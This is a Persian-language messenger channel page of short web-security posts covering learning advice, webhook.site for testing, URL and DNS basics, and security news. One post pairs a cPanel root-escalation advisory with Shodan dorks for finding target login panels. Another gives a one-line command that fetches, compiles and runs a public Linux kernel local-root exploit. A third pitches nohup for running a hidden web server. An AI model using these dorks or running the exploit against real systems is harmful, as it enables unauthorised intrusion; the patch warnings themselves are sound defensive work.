بله | کانال WebSecPath | امنیت و زبان
عکس پروفایل WebSecPath | امنیت و زبانW

WebSecPath | امنیت و زبان

۳۵۹ عضو
لوگوی پیام رسان بلهدانلود «بله»
قبل از هرچیز بگم بزرگترین اشتباه خودم تو این مدت چی بود؟؟؟خوندن و خوندن و خوندن.... و منتظر این بودن ک تیم آپ کنیم گروهی کار کنیمundefinedبهش میگن آماده شدن برای آماده شدن... ی لوپ تکراری. هی فک میکنی کمه.... من تاحالا بیش از 1000تا رایتاپ خوندم....چندتا کتاب تخصصی خوندم....مث برنامه نویسیه.باید دست ب کیبورد شین و تست کنین و تست کنین....ابزار؟ devtools مرورگر. تهش Burp... تارگت؟لابراتوار های خارجی یا داخلی. یا ی تارگت واقعی ک میگم چجوری پیداش کنیundefined. متودولوژی میتونی واسه خودت بسازی...میگم چجوری. یه لطفی به خودت بکن و تمرکزتو بذار رو فهم کانسپت ها... ول کن اسم هارو... ساده بگیر. جدی میگمundefinedشاید تنها شغلی که با اومدن ai داغتر شده همین امنیت و پن تست باشه.... تنور حسابی داغه. آماده ای؟ undefinedundefined (ایرانی بودن محدودیت هست ولیییی من بهت یه راه دیگه میگم.کی گفته مجبوریم ایرانی کار کنیم؟ undefined )

۰:۰۸

یه نکته ای بگم ک واسه خودم اولاش خیلی سوال بود؟!undefinedهمیشه میدیدم نوشته Attacker.com یا evil.com. تو رایتاپ ها یا آموزش ها که میخوندم فک میکردم حتما باید خودم ی vps بگیرم ی سایت بسازم و...(واسه یسری آسیبپذیری ها خب بله بعدن.. ) ولیما خیلی وقتا همینقد ک بدونیم درخواست میاد کافیه.ی سایتی هست ب اسم webhook.site میتونین ازون استفاده کنینundefinedخداشاهده این ی مدت طولانی سوال خودم بود. ی آدرس بهتون میده ک ب عنوان مثلا سایت اتکر ازش استفاده میکنین.جواب تستا میاد اونجا براتونundefinedundefinedمیخام بگم اولاش یسری سوالا ممکنه براتون پیش بیاد ک اصن تکنیکالم نیست. طبیعیه.بپرسین.🫡@websecpathundefined

۱:۴۸

در حال حاضر نمایش این پیام پشتیبانی نمی‌شود.

WebSecPath | امنیت و زبان
سی پنل مجدد چند ساعت پیش آپدیت امنیتی داد ( این باگ نیز به شدت خطرناک هست و به کاربر اجازه میده بتونه تبدیل به ادمین ( روت ) شود ) مجدد آپدیت کنید بعد از آپدیت باید نسخه های زیر یا بالاتر باشد 11.136.0.9 and higher 11.134.0.25 and higher 11.132.0.31 and higher 11.130.0.22 and higher 11.126.0.58 and higher 11.124.0.37 and higher 11.118.0.66 and higher 11.110.0.116 and higher 11.110.0.117 and higher 11.102.0.41 and higher 11.94.0.30 and higher 11.86.0.43 and higher
همش رو یه \r\n میشه هااااامن نمیگم چجوری ولی با این sodan dork میتونین تارگت پیدا کنین. بسم اللهundefinedundefinedtitle:"WHM Login"title:"WebHost Manager" port:2087product:"cPanel" port:2087http.title:"cPanel" port:2083ssl.cert.subject.cn:"cPanel" port:2087
@websecpathundefined

۴:۰۴

رو 70میلیوووون Domain تاثیر گذاشته تاحالاundefinedکلن 4تامرحله داره این حمله....ترسناکه نه؟undefinedundefinedundefinedundefinedقلقلکم میاد ولی خب دختر خوبی ام اجازه میگیرم قبلش🦭
یاGCC! مَسموح؟undefinedundefined

۴:۱۴

برای بار آخر میپرسمundefined یا امانه مجلس التعاون الخلیجی،هل من اذن؟ undefinedundefinedعروس خانوم رفته واسه باباش نفت بیارهundefinedگیلیلیلیلیلیلی

۴:۲۰

اول وارد وب سایت زیر میشی و اکستنشن مورد نظرت جستجو و دانلود میکنی : undefined vscode.devneeds.ir undefined
حالا وارد VS Code میشی و دکمه های ترکیبی Ctrl+Shift+P میزنی. undefinedundefined
داخل نوار جستجو ای که باز میشه ، عبارت زیر مینویسی و انتخابش میکنی : undefined
Extensions: Install from VSIX
وقتی گزینه بالا را انتخاب کردی ، یدونه پنجره باز میشه و ازت میخواد فایل اکستنشن دانلود شده را بهش بدی و تمام. undefinedundefined
undefined@webehsan undefinedundefinedروش نصب اکستنشن vscode با نت ملی undefined

۱۲:۵۶

undefined یه دستور اجرا کن… بدون اینکه دیده بشه!
nohup command &
undefined حتی بعد از بستن ترمینال اجرا میشه!
undefined ترکیب حرفه‌ای:nohup python3 server.py &
undefined یه وب‌سرور مخفی بساز!
@lpicfarsiundefined

۱۳:۰۰

دوباره یه مشکل امنیتی حاد در کرنل لینوکس داریم که باهاش هر یوزر لوکال می تونه دسترسی روت بگیره. بهش می گن درتی فرگ.
رپوزیتوری اینجاست:‌https://github.com/V4bel/dirtyfragو دستوری که دسترسی می ده اینه: git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت@LearnSecpathundefined

۱۷:۰۷

چرا URL اینقدر مهمه؟undefinedچون:undefinedکل وب بر پایه URL ساخته شدهundefinedمرورگر بر اساس URL تصمیم امنیتی می‌گیرهundefinedOrigin از URL ساخته می‌شه(مباحث مربوط به same origin & Cross site & same site) بعد درک url و مرورگر خیلی از آسیب پذیری ها و مکانیزم های مرورگر که گاهن حتا تداخل پارسر ها توش ایجاد باگ و آسیب پذیری میکنه رو درک میکنیundefinedundefinedURL فقط «آدرس» نیستundefinedundefinedundefinedمرورگر با URL تصمیم می‌گیره:به کجا وصل شهچه پورتی استفاده شودآیا SOP اجازه دسترسی دارهآیا Cookie ارسال شهآیا HTTPS لازمهآیا CSP اعمال شهو... undefined
https://admin.shop.example.com:8443/dashboard/users?id=7&role=admin#profileاین یه نمونه س که میخایم تیکه تیکه ش کنیمundefined

@websecpathundefined

۳:۵۸

وقتی کاربر اینو وارد می‌کنه:
undefinedhttps://shop.example.com/productsمرورگر فقط «صفحه باز نمی‌کنه».undefinedپشت صحنه:DNSPortTCPTLSHTTPو..همه فعال می‌شنundefinedDNS دفترچه تلفن وب عهundefined
ما url رو(دامنه) رو وارد مرورگر میکنیم. ولی کامپیوتر ها ip رو میفهمن. DNS دامنه رو به ip تبدیل میکنهundefined
https://google.comundefined 142.250.x.xundefinedمرورگر به این ip وصل میشه در اصل
مثلن شما تو گوشیتون شماره من رو به اسم 'بنده خدا' ذخیره کردین. شما اسم رو انتخاب میکنین. ولی وقتی call انجام میدین شماره منه که بهش تماس برقرار شده. گوشی شما که منو نمیشناسهundefined
@websecpathundefined

۴:۱۷

در حال حاضر نمایش این پیام پشتیبانی نمی‌شود.

شاید ندونی ولی
اولین برنامه‌نویس دنیا یه خانوم بود به اسم «آدا لاولیس» undefined
حدود ۲۰۰ سال پیش، قبل از اینکه کامپیوتر اصلاً وجود داشته باشه، اون یه سری دستورالعمل (همون الگوریتم) نوشت برای ماشین محاسباتی چارلز بابیج. خلاصه که اولین کسی بود که فهمید ماشین فقط حساب‌وکتاب نیست، میشه با اون کارای دیگه هم کرد.
پس هر وقت برنامه‌نویسی کردی، بدون اولین بار یه خانوم این راه رو باز کرده undefined
undefined @websecpath

۵:۲۰

بازارسال شده از TheAliBigdeli Channel
thumbnail
امینت ارزش افزوده نیست واجبه
دوستان، یه صحبتی داشتم؛ همون‌طور که می‌دونید همیشه توی کدهای وب یه سری خلاءهای امنیتی هست که یا نمی‌دونیم یا از دستمون در میره. چیزایی مثل هدرهای ناقص، CORS غلط، اعتبارسنجی (Validation) ضعیف، یا مدیریت بدِ Environment Variable‌ها. حتی فراموش کردن آپدیت نگه‌داشتن پکیج‌ها (Dependabot) هم یه گلوگاه جدیه.
برای همین تصمیم گرفتم با سرکار خانم فیض از کانال @websecpath هماهنگ کنیم تا یه چک‌لیست و استاندارد امنیتی براشون تعریف کنیم.هدفمون اینه که دیگه فقط "کار کردن پروژه" کافی نباشه؛ می‌خوایم یه ارزش افزوده واقعی به مشتری بدیم. یعنی کدی که نه تنها باگ نداره، بلکه از نظر امنیتی (Secure Code) هم محکم و ایمنه و ما هم خیلمون راحت که چیزی از قلم نیفتاده.
اطلاعات به صورت خورد بر روی کانال خودشون قرار میگیره و می تونین استفاده کنین و جلسات مربوط بهش رو هم سعی میکنم پیگیری کنم و برگزار کنیم.
@thealibigdeli_channel#security#secure_code

۷:۱۰

undefined من توصیه‌ای به ثبت‌نام اینترنت پرو ندارمولی دیدم بعضیا برای ثبت‌نامش پول میگیرن در صورتی که اصلا نیازی نیست
برای ثبت‌نام اینترنت پرو به کسی هزینه ندیناز طریق این سایت خودتون ثبت‌نام کنید undefined
https://manatsp.ir/flm/سامانه ثبت‌نام اینترنت پرو
معمولا اگر تایید بشه حدود یک هفته بعد پیام براتون میاد و میتونین از تلگرام و واتساپ بدون فیلتر استفاده کنید.
در هر صورت من ثبت نام نمیکنم....undefinedundefined@websecpath

۸:۴۱

thumbnail
اینکه جای 'مناسبی' هستی، به این معنی نیست که جای 'درستی' هستیundefined
undefinedWebsecpath

۱۲:۴۸

بازارسال شده از ربات پیام ناشناس
undefined لینک ناشناس شما:
ble.ir/payamresanimbot?start=2rsNHMubpM775ZnB6rP5iNuEj
undefined این لینک را برای هر کسی بفرستید تا بتواند به‌صورت ناشناس با شما صحبت کند.
undefined لطفاً با توجه به شرایط، از ارسال هرگونه پیام مغایر با قوانین جمهوری اسلامی ایران خودداری کنید.

۱۴:۵۳

سوال، انتقاد، پیشنهادundefinedundefinedundefinedundefinedundefinedundefined

۱۴:۵۴

undefined OpenAI از پلتفرم امنیت سایبری «Daybreak» رونمایی کرد که با تکیه بر عامل Codex Security، مدل تهدیدات سازمان‌ها را ترسیم و مسیرهای احتمالی نفوذ را به‌طور خودکار اعتبارسنجی می‌کند. این حرکت پاسخی به رقیب انتروپیک است و دفاع سایبری را به سامانه‌ای فعال و پیش‌دستانه تبدیل می‌کند.
undefined@websecpath

۱۴:۵۸